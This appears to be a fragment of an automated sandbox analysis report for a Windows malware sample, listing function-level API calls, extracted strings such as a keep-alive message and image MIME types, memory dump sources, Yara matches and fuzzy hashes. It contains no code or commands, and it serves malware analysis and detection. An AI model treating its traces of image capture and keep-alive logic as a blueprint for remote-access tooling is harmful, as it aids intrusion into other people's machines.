                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 219979c3f9182af5e0a522c4ab851fea51af6e4da579dc1b438f2ddc11bd8505
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF0A7F76042050EBB08E774A85792B72C8DB252E0711033AF11BCB686FD32E8D48159
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 1000C872
                                                                                                                                                                                                                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 1000C877
                                                                                                                                                                                                                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 1000C87C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000D4B2: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 1000D4C3
                                                                                                                                                                                                                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 1000C891
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                              • String ID: 4[G$4[G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2931989736-4028565467
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0283655C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028362BC: IsProcessorFeaturePresent.KERNEL32(00000017,028362AB,00000000,?,?,?,?,00000016,?,?,028362B8,00000000,00000000,00000000,00000000,00000000), ref: 028362BE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028362BC: GetCurrentProcess.KERNEL32(C0000417), ref: 028362E0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028362BC: TerminateProcess.KERNEL32(00000000), ref: 028362E7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10018AAC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000DAC8: IsProcessorFeaturePresent.KERNEL32(00000017,1000DA9A,1000A5B7,?,?,?,1000A5B7,00000016,?,?,1000DAA7,00000000,00000000,00000000,00000000,00000000), ref: 1000DACA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000DAC8: GetCurrentProcess.KERNEL32(C0000417,?,1000A5B7), ref: 1000DAEC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000DAC8: TerminateProcess.KERNEL32(00000000,?,1000A5B7), ref: 1000DAF3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100055E1
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 100055EB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2556327735
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10003FDB
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 67010eaabe5ec19f8eb2dbbdff826c503681b6fb1e0afb3ed4744b86d6ac49c7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9ae4267b34400fa55d51dc4f8be9ceed40e1449c4501b0f5fd7de9ec1f04af8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631D2367043128BE721CE5CE840B67F7F9EB916A1F214A3FF5468B649D772A84087A1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 1000AE36
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                                              • String ID: $MZ@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2325560087-1719208621
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c10e40035c381da4b7154146db833fe46c232d81a9f0e8cf3361085bbbd73af4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 391da35a3863b86254b03c17b4306fa7bf071c5b162a5709827f420cadfd38cb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5516AB1D10A568BEB44CFA5C8C16AEBBF4FB48394F20C16AD409EB254D334A981CF60
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                                                                                                                              • String ID: $vD
                                                                                                                                                                                                                                                                                                                              • API String ID: 1807457897-3636070802
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10003B85
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 753ed6a34f3666a5248bbcea129088d50049987ac77d3d9b3624efbd587c36aa
                                                                                                                                                                                                                                                                                                                              • Instruction ID: edc99c1af25dbac56c4533e702380cee898722e9e6e8df2b93293301c0b2d031
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 753ed6a34f3666a5248bbcea129088d50049987ac77d3d9b3624efbd587c36aa
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F631CF32304710CB9721DF6CE88085BF3E9FF85695311862FE686C7219EB31A95487A2
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000818D
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10008197
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: vector<T> too long
• API String ID: 909987262-3788999226
• Opcode ID: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
• Instruction ID: 1ccc3903a69bb7a6bcf247a0b5372026bbc2c80ecff82e53e65115d2b39116d6
• Opcode Fuzzy Hash: cb9423fad82669d08df49fd2dc675643d09d7b70617caed834aba26ae0979558
• Instruction Fuzzy Hash: A231C2353006065FDB2CCE79DDD445AB7E6FF842A03288A3DE587C7688D671F9418740
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
• SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
• Opcode ID: 867671ad2bd7bdec4e17951a99ce700f1927d2a65d9f843cc66d93939dd8d571
• Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
• Opcode Fuzzy Hash: 867671ad2bd7bdec4e17951a99ce700f1927d2a65d9f843cc66d93939dd8d571
• Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
• Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
• Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
• Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
• std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: string too long
• API String ID: 909987262-2556327735
• Opcode ID: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
• Instruction ID: b01bb7ab5e5c576250ddf7c738205e91cfded369ea80ce7225221d4f8e50cbfb
• Opcode Fuzzy Hash: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
• Instruction Fuzzy Hash: 6321BF34608781DFE721CF1CC880B4ABBF4FB46690F604B5EF49687645C772AA8487A2
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                                                                                                                                              • String ID: image/png
                                                                                                                                                                                                                                                                                                                              • API String ID: 1291196975-2966254431
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                                                                                                              • API String ID: 481472006-1507639952
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: LG$XG
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1482930923
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                                                                                                              • String ID: : $Se.
                                                                                                                                                                                                                                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
